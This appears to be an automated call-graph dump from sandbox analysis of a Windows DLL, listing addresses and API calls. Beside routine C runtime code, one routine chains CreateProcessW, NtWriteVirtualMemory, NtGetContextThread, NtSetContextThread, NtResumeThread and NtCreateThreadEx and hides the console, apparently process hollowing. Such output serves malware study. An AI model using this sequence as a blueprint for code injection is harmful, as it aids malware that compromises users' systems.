62 API calls 12091->12092 12092->12089 12094 6ce352a4 12093->12094 12095 6ce352b9 12093->12095 12096 6ce32dcb _free 14 API calls 12094->12096 12095->12082 12097 6ce352a9 12096->12097 12098 6ce315a8 ___std_exception_copy 25 API calls 12097->12098 12099 6ce352b4 12098->12099 12099->12082 12101 6ce36583 12100->12101 12102 6ce36590 12100->12102 12103 6ce32dcb _free 14 API calls 12101->12103 12104 6ce365d9 12102->12104 12106 6ce365b7 12102->12106 12110 6ce36588 12103->12110 12105 6ce32dcb _free 14 API calls 12104->12105 12107 6ce365de 12105->12107 12109 6ce364d0 ___scrt_uninitialize_crt 29 API calls 12106->12109 12108 6ce315a8 ___std_exception_copy 25 API calls 12107->12108 12108->12110 12109->12110 12110->12079 12111->12086 12112->12072 12114 6ce310a6 12113->12114 12116 6ce30cc4 12113->12116 12121 6ce31271 12114->12121 12117 6ce310f3 12116->12117 12118 6ce3111d 12117->12118 12119 6ce310fe 12117->12119 12118->12042 12120 6ce31108 DeleteCriticalSection 12119->12120 12120->12118 12120->12120 12126 6ce311ed 12121->12126 12124 6ce312a3 TlsFree 12125 6ce31297 12124->12125 12125->12116 12127 6ce31228 12126->12127 12128 6ce31205 12126->12128 12127->12124 12127->12125 12128->12127 12132 6ce31153 12128->12132 12131 6ce3121a GetProcAddress 12131->12127 12138 6ce3115f ___vcrt_InitializeCriticalSectionEx 12132->12138 12133 6ce31175 LoadLibraryExW 12135 6ce31193 GetLastError 12133->12135 12136 6ce311da 12133->12136 12134 6ce311d3 12134->12127 12134->12131 12135->12138 12136->12134 12137 6ce311e2 FreeLibrary 12136->12137 12137->12134 12138->12133 12138->12134 12139 6ce311b5 LoadLibraryExW 12138->12139 12139->12136 12139->12138 12145 6ce323e3 12140->12145 12143 6ce3109c ___vcrt_uninitialize_ptd 6 API calls 12144 6ce2e885 12143->12144 12144->11859 12148 6ce32bdf 12145->12148 12149 6ce32be9 12148->12149 12151 6ce2ed6d 12148->12151 12152 6ce34510 12149->12152 12151->12143 12153 6ce343ef __dosmaperr 5 API calls 12152->12153 12154 6ce3452c 12153->12154 12155 6ce34547 TlsFree 12154->12155 12156 6ce34535 12154->12156 12156->12151 12157->11835 12158 6ce2e684 12159 6ce2e6c2 12158->12159 12160 6ce2e68f 12158->12160 12163 6ce2e7de __DllMainCRTStartup@12 84 API calls 12159->12163 12161 6ce2e6b4 12160->12161 12162 6ce2e694 12160->12162 12170 6ce2e6d7 12161->12170 12164 6ce2e6aa 12162->12164 12165 6ce2e699 12162->12165 12168 6ce2e69e 12163->12168 12189 6ce2ece3 12164->12189 12165->12168 12184 6ce2ed02 12165->12184 12171 6ce2e6e3 ___scrt_is_nonwritable_in_current_image 12170->12171 12197 6ce2ed73 12171->12197 12173 6ce2e6ea __DllMainCRTStartup@12 12174 6ce2e711 12173->12174 12175 6ce2e7d6 12173->12175 12181 6ce2e74d ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 12173->12181 12205 6ce2ecd5 12174->12205 12177 6ce2ef12 __DllMainCRTStartup@12 4 API calls 12175->12177 12178 6ce2e7dd 12177->12178 12179 6ce2e720 __RTC_Initialize 12179->12181 12208 6ce2ebf3 InitializeSListHead 12179->12208 12181->12168 12182 6ce2e72e 12182->12181 12209 6ce2ecaa 12182->12209 12258 6ce323ab 12184->12258 12461 6ce30ca0 12189->12461 12194 6ce2ecff 12194->12168 12195 6ce30cab 21 API calls 12196 6ce2ecec 12195->12196 12196->12168 12198 6ce2ed7c 12197->12198 12213 6ce2f0d8 IsProcessorFeaturePresent 12198->12213 12202 6ce2ed8d 12203 6ce2ed91 12202->12203 12204 6ce30cb6 ___scrt_uninitialize_crt 7 API calls 12202->12204 12203->12173 12204->12203 12252 6ce2edac 12205->12252 12207 6ce2ecdc 12207->12179 12208->12182 12210 6ce2ecaf ___scrt_release_startup_lock 12209->12210 12211 6ce2f0d8 IsProcessorFeaturePresent 12210->12211 12212 6ce2ecb8 12210->12212 12211->12212 12212->12181 12214 6ce2ed88 12213->12214 12215 6ce30c81 12214->12215 12223 6ce310b7 12215->12223 12218 6ce30c8a 12218->12202 12220 6ce30c92 12221 6ce30c9d 12220->12221 12222 6ce310f3 ___vcrt_uninitialize_locks DeleteCriticalSection 12220->12222 12221->12202 12222->12218 12224 6ce310c0 12223->12224 12226 6ce310e9 12224->12226 12227 6ce30c86 12224->12227 12237 6ce31325 12224->12237 12228 6ce310f3 ___vcrt_uninitialize_locks DeleteCriticalSection 12226->12228 12227->12218 12229 6ce31069 12227->12229 12228->12227 12242 6ce31236 12229->12242 12232 6ce3107e 12232->12220 12235 6ce31099 12235->12220 12236 6ce3109c ___vcrt_uninitialize_ptd 6 API calls 12236->12232 12238 6ce311ed ___vcrt_InitializeCriticalSectionEx 5 API calls 12237->12238 12239 6ce3133f 12238->12239 12240 6ce31348 12239->12240 12241 6ce3135d InitializeCriticalSectionAndSpinCount 12239->12241 12240->12224 12241->12240 12243 6ce311ed ___vcrt_InitializeCriticalSectionEx 5 API calls 12242->12243 12244 6ce31250 12243->12244 12245 6ce31269 TlsAlloc 12244->12245 12246 6ce31073 12244->12246 12246->12232 12247 6ce312e7 12246->12247 12248 6ce311ed ___vcrt_InitializeCriticalSectionEx 5 API calls 12247->12248 12249 6ce31301 12248->12249 12250 6ce3108c 12249->12250 12251 6ce3131c TlsSetValue 12249->12251 12250->12235 12250->12236 12251->12250 12253 6ce2edb8 12252->12253 12254 6ce2edbc 12252->12254 12253->12207 12255 6ce2ef12 __DllMainCRTStartup@12 4 API calls 12254->12255 12257 6ce2edc9 ___scrt_release_startup_lock 12254->12257 12256 6ce2ee32 12255->12256 12257->12207 12264 6ce3297b 12258->12264 12261 6ce30cab 12444 6ce30f93 12261->12444 12265 6ce2ed07 12264->12265 12266 6ce32985 12264->12266 12265->12261 12267 6ce3454f __dosmaperr 6 API calls 12266->12267 12268 6ce3298c 12267->12268 12268->12265 12269 6ce3458e __dosmaperr 6 API calls 12268->12269 12270 6ce3299f 12269->12270 12272 6ce32842 12270->12272 12273 6ce3285d 12272->12273 12274 6ce3284d 12272->12274 12273->12265 12278 6ce32863 12274->12278 12277 6ce32ce7 _free 14 API calls 12277->12273 12279 6ce3287e 12278->12279 12280 6ce32878 12278->12280 12282 6ce32ce7 _free 14 API calls 12279->12282 12281 6ce32ce7 _free 14 API calls 12280->12281 12281->12279 12283 6ce3288a 12282->12283 12284 6ce32ce7 _free 14 API calls 12283->12284 12285 6ce32895 12284->12285 12286 6ce32ce7 _free 14 API calls 12285->12286 12287 6ce328a0 12286->12287 12288 6ce32ce7 _free 14 API calls 12287->12288 12289 6ce328ab 12288->12289 12290 6ce32ce7 _free 14 API calls 12289->12290 12291 6ce328b6 12290->12291 12292 6ce32ce7 _free 14 API calls 12291->12292 12293 6ce328c1 12292->12293 12294 6ce32ce7 _free 14 API calls 12293->12294 12295 6ce328cc 12294->12295 12296 6ce32ce7 _free 14 API calls 12295->12296 12297 6ce328d7 12296->12297 12298 6ce32ce7 _free 14 API calls 12297->12298 12299 6ce328e5 12298->12299 12304 6ce3268f 12299->12304 12305 6ce3269b ___scrt_is_nonwritable_in_current_image 12304->12305 12320 6ce32c3a EnterCriticalSection 12305->12320 12307 6ce326a5 12310 6ce32ce7 _free 14 API calls 12307->12310 12311 6ce326cf 12307->12311 12310->12311 12321 6ce326ee 12311->12321 12312 6ce326fa 12313 6ce32706 ___scrt_is_nonwritable_in_current_image 12312->12313 12325 6ce32c3a EnterCriticalSection 12313->12325 12315 6ce32710 12326 6ce32930 12315->12326 12317 6ce32723 12330 6ce32743 12317->12330 12320->12307 12324 6ce32c82 LeaveCriticalSection 12321->12324 12323 6ce326dc 12323->12312 12324->12323 12325->12315 12327 6ce32966 __dosmaperr 12326->12327 12328 6ce3293f __dosmaperr 12326->12328 12327->12317 12328->12327 12333 6ce35400 12328->12333 12443 6ce32c82 LeaveCriticalSection 12330->12443 12332 6ce32731 12332->12277 12334 6ce35480 12333->12334 12337 6ce35416 12333->12337 12335 6ce354ce 12334->12335 12338 6ce32ce7 _free 14 API calls 12334->12338 12401 6ce35571 12335->12401 12337->12334 12339 6ce35449 12337->12339 12344 6ce32ce7 _free 14 API calls 12337->12344 12340 6ce354a2 12338->12340 12341 6ce3546b 12339->12341 12349 6ce32ce7 _free 14 API calls 12339->12349 12342 6ce32ce7 _free 14 API calls 12340->12342 12343 6ce32ce7 _free 14 API calls 12341->12343 12345 6ce354b5 12342->12345 12346 6ce35475 12343->12346 12348 6ce3543e 12344->12348 12350 6ce32ce7 _free 14 API calls 12345->12350 12351 6ce32ce7 _free 14 API calls 12346->12351 12347 6ce3553c 12352 6ce32ce7 _free 14 API calls 12347->12352 12361 6ce37337 12348->12361 12355 6ce35460 12349->12355 12356 6ce354c3 12350->12356 12351->12334 12359 6ce35542 12352->12359 12354 6ce32ce7 14 API calls _free 12360 6ce354dc 12354->12360 12389 6ce37435 12355->12389 12358 6ce32ce7 _free 14 API calls 12356->12358 12358->12335 12359->12327 12360->12347 12360->12354 12362 6ce37431 12361->12362 12363 6ce37348 12361->12363 12362->12339 12364 6ce37359 12363->12364 12366 6ce32ce7 _free 14 API calls 12363->12366 12365 6ce3736b 12364->12365 12367 6ce32ce7 _free 14 API calls 12364->12367 12368 6ce3737d 12365->12368 12369 6ce32ce7 _free 14 API calls 12365->12369 12366->12364 12367->12365 12370 6ce3738f 12368->12370 12371 6ce32ce7 _free 14 API calls 12368->12371 12369->12368 12372 6ce373a1 12370->12372 12374 6ce32ce7 _free 14 API calls 12370->12374 12371->12370 12373 6ce373b3 12372->12373 12375 6ce32ce7 _free 14 API calls 12372->12375 12376 6ce373c5 12373->12376 12377 6ce32ce7 _free 14 API calls 12373->12377 12374->12372 12375->12373 12378 6ce373d7 12376->12378 12379 6ce32ce7 _free 14 API calls 12376->12379 12377->12376 12380 6ce373e9 12378->12380 12382 6ce32ce7 _free 14 API calls 12378->12382 12379->12378 12381 6ce373fb 12380->12381 12383 6ce32ce7 _free 14 API calls 12380->12383 12384 6ce3740d 12381->12384 12385 6ce32ce7 _free 14 API calls 12381->12385 12382->12380 12383->12381 12386 6ce3741f 12384->12386 12387 6ce32ce7 _free 14 API calls 12384->12387 12385->12384 12386->12362 12388 6ce32ce7 _free 14 API calls 12386->12388 12387->12386 12388->12362 12390 6ce37442 12389->12390 12400 6ce3749a 12389->12400 12391 6ce37452 12390->12391 12392 6ce32ce7 _free 14 API calls 12390->12392 12393 6ce32ce7 _free 14 API calls 12391->12393 12395 6ce37464 12391->12395 12392->12391 12393->12395 12394 6ce37476 12397 6ce37488 12394->12397 12398 6ce32ce7 _free 14 API calls 12394->12398 12395->12394 12396 6ce32ce7 _free 14 API calls 12395->12396 12396->12394 12399 6ce32ce7 _free 14 API calls 12397->12399 12397->12400 12398->12397 12399->12400 12400->12341 12402 6ce3559d 12401->12402 12403 6ce3557e 12401->12403 12402->12360 12403->12402 12407 6ce374d6 12403->12407 12406 6ce32ce7 _free 14 API calls 12406->12402 12408 6ce35597 12407->12408 12409 6ce374e7 12407->12409 12408->12406 12410 6ce3749e __dosmaperr 14 API calls 12409->12410 12411 6ce374ef 12410->12411 12412 6ce3749e __dosmaperr 14 API calls 12411->12412 12413 6ce374fa 12412->12413 12414 6ce3749e __dosmaperr 14 API calls 12413->12414 12415 6ce37505 12414->12415 12416 6ce3749e __dosmaperr 14 API calls 12415->12416 12417 6ce37510 12416->12417 12418 6ce3749e __dosmaperr 14 API calls 12417->12418 12419 6ce3751e 12418->12419 12420 6ce32ce7 _free 14 API calls 12419->12420 12421 6ce37529 12420->12421 12422 6ce32ce7 _free 14 API calls 12421->12422 12423 6ce37534 12422->12423 12424 6ce32ce7 _free 14 API calls 12423->12424 12425 6ce3753f 12424->12425 12426 6ce3749e __dosmaperr 14 API calls 12425->12426 12427 6ce3754d 12426->12427 12428 6ce3749e __dosmaperr 14 API calls 12427->12428 12429 6ce3755b 12428->12429 12430 6ce3749e __dosmaperr 14 API calls 12429->12430 12431 6ce3756c 12430->12431 12432 6ce3749e __dosmaperr 14 API calls 12431->12432 12433 6ce3757a 12432->12433 12434 6ce3749e __dosmaperr 14 API calls 12433->12434 12435 6ce37588 12434->12435 12436 6ce32ce7 _free 14 API calls 12435->12436 12437 6ce37593 12436->12437 12438 6ce32ce7 _free 14 API calls 12437->12438 12439 6ce3759e 12438->12439 12440 6ce32ce7 _free 14 API calls 12439->12440 12441 6ce375a9 12440->12441 12442 6ce32ce7 _free 14 API calls 12441->12442 12442->12408 12443->12332 12445 6ce2ed0c 12444->12445 12447 6ce30fa0 12444->12447 12445->12168 12446 6ce30fae 12449 6ce312e7 ___vcrt_FlsSetValue 6 API calls 12446->12449 12447->12446 12452 6ce312ac 12447->12452 12450 6ce30fbe 12449->12450 12457 6ce30f77 12450->12457 12453 6ce311ed ___vcrt_InitializeCriticalSectionEx 5 API calls 12452->12453 12454 6ce312c6 12453->12454 12455 6ce312de TlsGetValue 12454->12455 12456 6ce312d2 12454->12456 12455->12456 12456->12446 12458 6ce30f81 12457->12458 12460 6ce30f8e 12457->12460 12459 6ce3173e ___vcrt_freefls@4 14 API calls 12458->12459 12458->12460 12459->12460 12460->12445 12467 6ce30fd7 12461->12467 12463 6ce2ece8 12463->12196 12464 6ce323a0 12463->12464 12465 6ce32afe __dosmaperr 14 API calls 12464->12465 12466 6ce2ecf4 12465->12466 12466->12194 12466->12195 12468 6ce30fe3 GetLastError 12467->12468 12469 6ce30fe0 12467->12469 12470 6ce312ac ___vcrt_FlsGetValue 6 API calls 12468->12470 12469->12463 12471 6ce30ff8 12470->12471 12472 6ce3105d SetLastError 12471->12472 12473 6ce312e7 ___vcrt_FlsSetValue 6 API calls 12471->12473 12480 6ce31017 12471->12480 12472->12463 12474 6ce31011 12473->12474 12475 6ce312e7 ___vcrt_FlsSetValue 6 API calls 12474->12475 12477 6ce31039 12474->12477 12474->12480 12475->12477 12476 6ce312e7 ___vcrt_FlsSetValue 6 API calls 12478 6ce3104d 12476->12478 12477->12476 12477->12478 12479 6ce3173e ___vcrt_freefls@4 14 API calls 12478->12479 12479->12480 12480->12472 13110 6ce3208f 13111 6ce320a1 13110->13111 13112 6ce320a7 13110->13112 13113 6ce3201c 14 API calls 13111->13113 13113->13112 13114 6ce2ed0f 13115 6ce2ed17 ___scrt_release_startup_lock 13114->13115 13118 6ce317cc 13115->13118 13117 6ce2ed3f 13119 6ce317db 13118->13119 13120 6ce317df 13118->13120 13119->13117 13123 6ce317ec 13120->13123 13124 6ce32afe __dosmaperr 14 API calls 13123->13124 13125 6ce317e8 13124->13125 13125->13117 13126 6ce31f4c 13127 6ce31f61 13126->13127 13128 6ce32dde __dosmaperr 14 API calls 13127->13128 13129 6ce31f88 13128->13129 13132 6ce32dde __dosmaperr 14 API calls 13129->13132 13133 6ce31fef 13129->13133 13138 6ce3200f 13129->13138 13139 6ce31fed 13129->13139 13141 6ce32ce7 _free 14 API calls 13129->13141 13143 6ce32431 13129->13143 13130 6ce32ce7 _free 14 API calls 13131 6ce32007 13130->13131 13132->13129 13135 6ce3201c 14 API calls 13133->13135 13136 6ce31ff5 13135->13136 13137 6ce32ce7 _free 14 API calls 13136->13137 13137->13139 13140 6ce315d5 ___std_exception_copy 11 API calls 13138->13140 13139->13130 13142 6ce3201b 13140->13142 13141->13129 13144 6ce3244c 13143->13144 13145 6ce3243e 13143->13145 13146 6ce32dcb _free 14 API calls 13144->13146 13145->13144 13149 6ce32463 13145->13149 13151 6ce32454 13146->13151 13147 6ce315a8 ___std_exception_copy 25 API calls 13148 6ce3245e 13147->13148 13148->13129 13149->13148 13150 6ce32dcb _free 14 API calls 13149->13150 13150->13151 13151->13147 11718 6ce04270 11728 6ce042cf std::bad_exception::bad_exception 11718->11728 11719 6ce0bac1 NtWriteVirtualMemory 11719->11728 11720 6ce09a92 NtWriteVirtualMemory 11720->11728 11721 6ce0b077 CloseHandle 11721->11728 11722 6ce0667b GetConsoleWindow ShowWindow 11759 6cdfd160 11722->11759 11724 6cdfd160 28 API calls 11724->11728 11726 6ce0c5c1 NtCreateThreadEx 11726->11728 11727 6ce0b344 11799 6ce2e610 11727->11799 11728->11719 11728->11720 11728->11721 11728->11722 11728->11724 11728->11726 11728->11727 11731 6ce0b424 GetConsoleWindow ShowWindow 11728->11731 11736 6ce0848d NtWriteVirtualMemory 11728->11736 11737 6ce0a9ac NtCreateThreadEx 11728->11737 11738 6ce0afd4 CloseHandle 11728->11738 11739 6ce06d5c VirtualAlloc 11728->11739 11740 6ce07ba2 NtWriteVirtualMemory 11728->11740 11741 6ce0c7f3 NtCreateThreadEx 11728->11741 11742 6ce0b954 NtWriteVirtualMemory 11728->11742 11743 6ce07ac1 NtAllocateVirtualMemory 11728->11743 11744 6ce0998d NtReadVirtualMemory 11728->11744 11745 6ce0b55d CreateProcessW 11728->11745 11746 6ce0c16f NtGetContextThread 11728->11746 11747 6ce0c1c1 NtWriteVirtualMemory 11728->11747 11748 6ce0bc8a NtCreateThreadEx 11728->11748 11749 6ce0af30 NtSetContextThread NtResumeThread 11728->11749 11752 6ce073f1 CreateProcessW 11728->11752 11753 6ce0c268 NtWriteVirtualMemory 11728->11753 11754 6ce0a1b4 NtWriteVirtualMemory 11728->11754 11755 6ce0bffe NtSetContextThread NtResumeThread 11728->11755 11756 6ce07e65 NtWriteVirtualMemory 11728->11756 11757 6ce077b2 NtGetContextThread 11728->11757 11758 6ce0c6b4 CloseHandle 11728->11758 11786 6ce02f70 11728->11786 11795 6cdfce50 11728->11795 11730 6ce0b34e 11732 6cdfd160 28 API calls 11731->11732 11735 6ce0b451 11732->11735 11733 6cdfd160 28 API calls 11733->11735 11734 6cdfce50 5 API calls 11734->11735 11735->11728 11735->11733 11735->11734 11736->11728 11737->11728 11738->11728 11739->11728 11740->11728 11741->11728 11742->11728 11743->11728 11744->11728 11745->11728 11746->11728 11747->11728 11748->11728 11749->11728 11752->11728 11753->11728 11754->11728 11755->11728 11756->11728 11757->11728 11758->11728 11783 6cdfd189 ___scrt_uninitialize_crt 11759->11783 11760 6ce003fa CreateFileMappingA 11760->11783 11761 6cdfe8e3 CreateFileMappingA 11761->11783 11762 6ce0067a VirtualProtect 11762->11783 11763 6ce00c89 GetModuleFileNameA 11763->11783 11764 6cdfe5a3 K32GetModuleInformation 11764->11783 11765 6ce00345 GetModuleFileNameA 11765->11783 11766 6cdfecda MapViewOfFile 11766->11783 11767 6cdffe71 CloseHandle CloseHandle 11767->11783 11768 6ce002cc 11769 6ce2e610 _ValidateLocalCookies 5 API calls 11768->11769 11770 6ce002d6 11769->11770 11770->11728 11771 6cdfe630 GetModuleFileNameA 11771->11783 11772 6cdff637 VirtualProtect 11772->11783 11773 6ce00abe CloseHandle 11773->11783 11774 6cdfe7c7 CreateFileA 11774->11783 11775 6ce0094c CloseHandle 11775->11783 11776 6ce00a43 GetCurrentProcess 11776->11783 11777 6cdfe185 GetCurrentProcess 11777->11783 11778 6cdfe221 ___scrt_uninitialize_crt std::bad_exception::bad_exception 11778->11762 11779 6cdfe250 GetModuleHandleA 11778->11779 11779->11783 11780 6cdffd89 CloseHandle 11780->11783 11781 6ce009e3 CloseHandle CloseHandle 11781->11783 11782 6ce00f92 CloseHandle 11782->11783 11783->11760 11783->11761 11783->11763 11783->11764 11783->11765 11783->11766 11783->11767 11783->11768 11783->11771 11783->11772 11783->11773 11783->11774 11783->11775 11783->11776 11783->11777 11783->11778 11783->11780 11783->11781 11783->11782 11784 6cdff908 VirtualProtect 11783->11784 11785 6cdfec34 CloseHandle 11783->11785 11784->11783 11785->11783 11787 6ce02fc9 11786->11787 11788 6ce035a4 GetModuleHandleW 11787->11788 11791 6ce03ca4 11787->11791 11794 6ce036dd NtQueryInformationProcess 11787->11794 11806 6ce00fc0 11788->11806 11790 6ce035ef std::bad_exception::bad_exception 11790->11787 11792 6ce2e610 _ValidateLocalCookies 5 API calls 11791->11792 11793 6ce03cb4 NtAllocateVirtualMemory 11792->11793 11793->11728 11794->11787 11796 6cdfce76 11795->11796 11797 6ce2e610 _ValidateLocalCookies 5 API calls 11796->11797 11798 6cdfd123 11797->11798 11798->11728 11800 6ce2e618 11799->11800 11801 6ce2e619 IsProcessorFeaturePresent 11799->11801 11800->11730 11803 6ce2ea24 11801->11803 11810 6ce2e9e7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11803->11810 11805 6ce2eb07 11805->11730 11807 6ce01030 11806->11807 11808 6ce2e610 _ValidateLocalCookies 5 API calls 11807->11808 11809 6ce02c5d 11808->11809 11809->11790 11810->11805 12481 6ce0edf0 12485 6ce0ee15 12481->12485 12482 6ce0f25c 12483 6ce2e610 _ValidateLocalCookies 5 API calls 12482->12483 12484 6ce0f271 12483->12484 12485->12482 12486 6ce2c9c0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12485->12486 12486->12485 12487 6ce31bf5 12488 6ce31c0c 12487->12488 12498 6ce31c05 12487->12498 12489 6ce31c2d 12488->12489 12491 6ce31c17 12488->12491 12514 6ce33d28 12489->12514 12493 6ce32dcb _free 14 API calls 12491->12493 12495 6ce31c1c 12493->12495 12511 6ce315a8 12495->12511 12503 6ce31c91 12505 6ce32dcb _free 14 API calls 12503->12505 12504 6ce31c9d 12506 6ce31d2b 37 API calls 12504->12506 12510 6ce31c96 12505->12510 12507 6ce31cb5 12506->12507 12509 6ce32ce7 _free 14 API calls 12507->12509 12507->12510 12508 6ce32ce7 _free 14 API calls 12508->12498 12509->12510 12510->12508 12542 6ce31544 12511->12542 12513 6ce315b4 12513->12498 12515 6ce33d31 12514->12515 12519 6ce31c33 12514->12519 12560 6ce32a64 12515->12560 12520 6ce3376f GetModuleFileNameW 12519->12520 12521 6ce337af 12520->12521 12522 6ce3379e GetLastError 12520->12522 12913 6ce334e8 12521->12913 12908 6ce32d95 12522->12908 12525 6ce337aa 12528 6ce2e610 _ValidateLocalCookies 5 API calls 12525->12528 12529 6ce31c46 12528->12529 12530 6ce31d2b 12529->12530 12532 6ce31d50 12530->12532 12534 6ce31db0 12532->12534 12952 6ce3404e 12532->12952 12533 6ce31c7b 12536 6ce31e9f 12533->12536 12534->12533 12535 6ce3404e 37 API calls 12534->12535 12535->12534 12537 6ce31eb0 12536->12537 12538 6ce31c88 12536->12538 12537->12538 12539 6ce32dde __dosmaperr 14 API calls 12537->12539 12538->12503 12538->12504 12540 6ce31ed9 12539->12540 12541 6ce32ce7 _free 14 API calls 12540->12541 12541->12538 12543 6ce32afe __dosmaperr 14 API calls 12542->12543 12544 6ce3154f 12543->12544 12545 6ce3155d 12544->12545 12550 6ce315d5 IsProcessorFeaturePresent 12544->12550 12545->12513 12547 6ce315a7 12548 6ce31544 ___std_exception_copy 25 API calls 12547->12548 12549 6ce315b4 12548->12549 12549->12513 12551 6ce315e1 12550->12551 12554 6ce313fc 12551->12554 12555 6ce31418 __DllMainCRTStartup@12 std::bad_exception::bad_exception 12554->12555 12556 6ce31444 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12555->12556 12559 6ce31515 __DllMainCRTStartup@12 12556->12559 12557 6ce2e610 _ValidateLocalCookies 5 API calls 12558 6ce31533 GetCurrentProcess TerminateProcess 12557->12558 12558->12547 12559->12557 12561 6ce32a6f 12560->12561 12565 6ce32a75 12560->12565 12563 6ce3454f __dosmaperr 6 API calls 12561->12563 12562 6ce3458e __dosmaperr 6 API calls 12564 6ce32a8f 12562->12564 12563->12565 12566 6ce32a7b 12564->12566 12567 6ce32dde __dosmaperr 14 API calls 12564->12567 12565->12562 12565->12566 12573 6ce32af4 12566->12573 12604 6ce3248b 12566->12604 12569 6ce32a9f 12567->12569 12571 6ce32aa7 12569->12571 12572 6ce32abc 12569->12572 12574 6ce3458e __dosmaperr 6 API calls 12571->12574 12575 6ce3458e __dosmaperr 6 API calls 12572->12575 12585 6ce33b74 12573->12585 12576 6ce32ab3 12574->12576 12577 6ce32ac8 12575->12577 12581 6ce32ce7 _free 14 API calls 12576->12581 12578 6ce32adb 12577->12578 12579 6ce32acc 12577->12579 12580 6ce327a9 __dosmaperr 14 API calls 12578->12580 12582 6ce3458e __dosmaperr 6 API calls 12579->12582 12583 6ce32ae6 12580->12583 12581->12566 12582->12576 12584 6ce32ce7 _free 14 API calls 12583->12584 12584->12566 12693 6ce33c88 12585->12693 12615 6ce34a82 12604->12615 12607 6ce3249b 12609 6ce324c4 12607->12609 12610 6ce324a5 IsProcessorFeaturePresent 12607->12610 12645 6ce31bd8 12609->12645 12611 6ce324b1 12610->12611 12614 6ce313fc __fassign 8 API calls 12611->12614 12614->12609 12648 6ce349b4 12615->12648 12618 6ce34ac7 12619 6ce34ad3 ___scrt_is_nonwritable_in_current_image 12618->12619 12620 6ce32afe __dosmaperr 14 API calls 12619->12620 12624 6ce34b00 __fassign 12619->12624 12625 6ce34afa __fassign 12619->12625 12620->12625 12621 6ce34b47 12622 6ce32dcb _free 14 API calls 12621->12622 12623 6ce34b4c 12622->12623 12626 6ce315a8 ___std_exception_copy 25 API calls 12623->12626 12627 6ce34b73 12624->12627 12659 6ce32c3a EnterCriticalSection 12624->12659 12625->12621 12625->12624 12644 6ce34b31 12625->12644 12626->12644 12630 6ce34ca6 12627->12630 12631 6ce34bb5 12627->12631 12641 6ce34be4 12627->12641 12633 6ce34cb1 12630->12633 12691 6ce32c82 LeaveCriticalSection 12630->12691 12631->12641 12660 6ce329a7 GetLastError 12631->12660 12635 6ce31bd8 __fassign 23 API calls 12633->12635 12637 6ce34cb9 12635->12637 12637->12607 12638 6ce329a7 __fassign 37 API calls 12642 6ce34c39 12638->12642 12640 6ce329a7 __fassign 37 API calls 12640->12641 12687 6ce34c53 12641->12687 12643 6ce329a7 __fassign 37 API calls 12642->12643 12642->12644 12643->12644 12644->12607 12646 6ce31a7e __DllMainCRTStartup@12 23 API calls 12645->12646 12647 6ce31be9 12646->12647 12649 6ce349c0 ___scrt_is_nonwritable_in_current_image 12648->12649 12654 6ce32c3a EnterCriticalSection 12649->12654 12651 6ce349ce 12655 6ce34a0c 12651->12655 12654->12651 12658 6ce32c82 LeaveCriticalSection 12655->12658 12657 6ce32490 12657->12607 12657->12618 12658->12657 12659->12627 12661 6ce329c4 12660->12661 12662 6ce329be 12660->12662 12663 6ce3458e __dosmaperr 6 API calls 12661->12663 12686 6ce329ca SetLastError 12661->12686 12664 6ce3454f __dosmaperr 6 API calls 12662->12664 12665 6ce329e2 12663->12665 12664->12661 12666 6ce32dde __dosmaperr 14 API calls 12665->12666 12665->12686 12668 6ce329f2 12666->12668 12669 6ce32a11 12668->12669 12670 6ce329fa 12668->12670 12675 6ce3458e __dosmaperr 6 API calls 12669->12675 12673 6ce3458e __dosmaperr 6 API calls 12670->12673 12671 6ce32a58 12671->12640 12672 6ce32a5e 12674 6ce3248b __fassign 35 API calls 12672->12674 12677 6ce32a08 12673->12677 12678 6ce32a63 12674->12678 12676 6ce32a1d 12675->12676 12679 6ce32a32 12676->12679 12680 6ce32a21 12676->12680 12683 6ce32ce7 _free 14 API calls 12677->12683 12682 6ce327a9 __dosmaperr 14 API calls 12679->12682 12681 6ce3458e __dosmaperr 6 API calls 12680->12681 12681->12677 12684 6ce32a3d 12682->12684 12683->12686 12685 6ce32ce7 _free 14 API calls 12684->12685 12685->12686 12686->12671 12686->12672 12688 6ce34c2a 12687->12688 12689 6ce34c59 12687->12689 12688->12638 12688->12642 12688->12644 12692 6ce32c82 LeaveCriticalSection 12689->12692 12691->12633 12692->12688 12694 6ce33c94 ___scrt_is_nonwritable_in_current_image 12693->12694 12695 6ce33cae 12694->12695 12737 6ce32c3a EnterCriticalSection 12694->12737 12697 6ce33b87 12695->12697 12700 6ce3248b __fassign 37 API calls 12695->12700 12704 6ce3391e 12697->12704 12698 6ce33cea 12738 6ce33d07 12698->12738 12701 6ce33d27 12700->12701 12702 6ce33cbe 12702->12698 12703 6ce32ce7 _free 14 API calls 12702->12703 12703->12698 12742 6ce324cf 12704->12742 12737->12702 12741 6ce32c82 LeaveCriticalSection 12738->12741 12740 6ce33d0e 12740->12695 12741->12740 12743 6ce324ef 12742->12743 12744 6ce329a7 __fassign 37 API calls 12743->12744 12745 6ce3250f 12744->12745 12749 6ce3523e 12745->12749 12750 6ce35251 12749->12750 12751 6ce32525 12749->12751 12750->12751 12757 6ce3564c 12750->12757 12753 6ce3526b 12751->12753 12754 6ce35293 12753->12754 12755 6ce3527e 12753->12755 12755->12754 12779 6ce33d70 12755->12779 12758 6ce35658 ___scrt_is_nonwritable_in_current_image 12757->12758 12759 6ce329a7 __fassign 37 API calls 12758->12759 12760 6ce35661 12759->12760 12767 6ce356a7 12760->12767 12770 6ce32c3a EnterCriticalSection 12760->12770 12762 6ce3567f 12771 6ce356cd 12762->12771 12767->12751 12768 6ce3248b __fassign 37 API calls 12769 6ce356cc 12768->12769 12770->12762 12772 6ce356db __dosmaperr 12771->12772 12774 6ce35690 12771->12774 12773 6ce35400 __dosmaperr 14 API calls 12772->12773 12772->12774 12773->12774 12775 6ce356ac 12774->12775 12778 6ce32c82 LeaveCriticalSection 12775->12778 12777 6ce356a3 12777->12767 12777->12768 12778->12777 12780 6ce329a7 __fassign 37 API calls 12779->12780 12781 6ce33d7a 12780->12781 12782 6ce33c88 __fassign 37 API calls 12781->12782 12783 6ce33d80 12782->12783 12783->12754 12939 6ce32db8 12908->12939 12910 6ce32da0 _free 12911 6ce32dcb _free 14 API calls 12910->12911 12912 6ce32db3 12911->12912 12912->12525 12914 6ce324cf __fassign 37 API calls 12913->12914 12915 6ce334fa 12914->12915 12916 6ce3350c 12915->12916 12942 6ce344b2 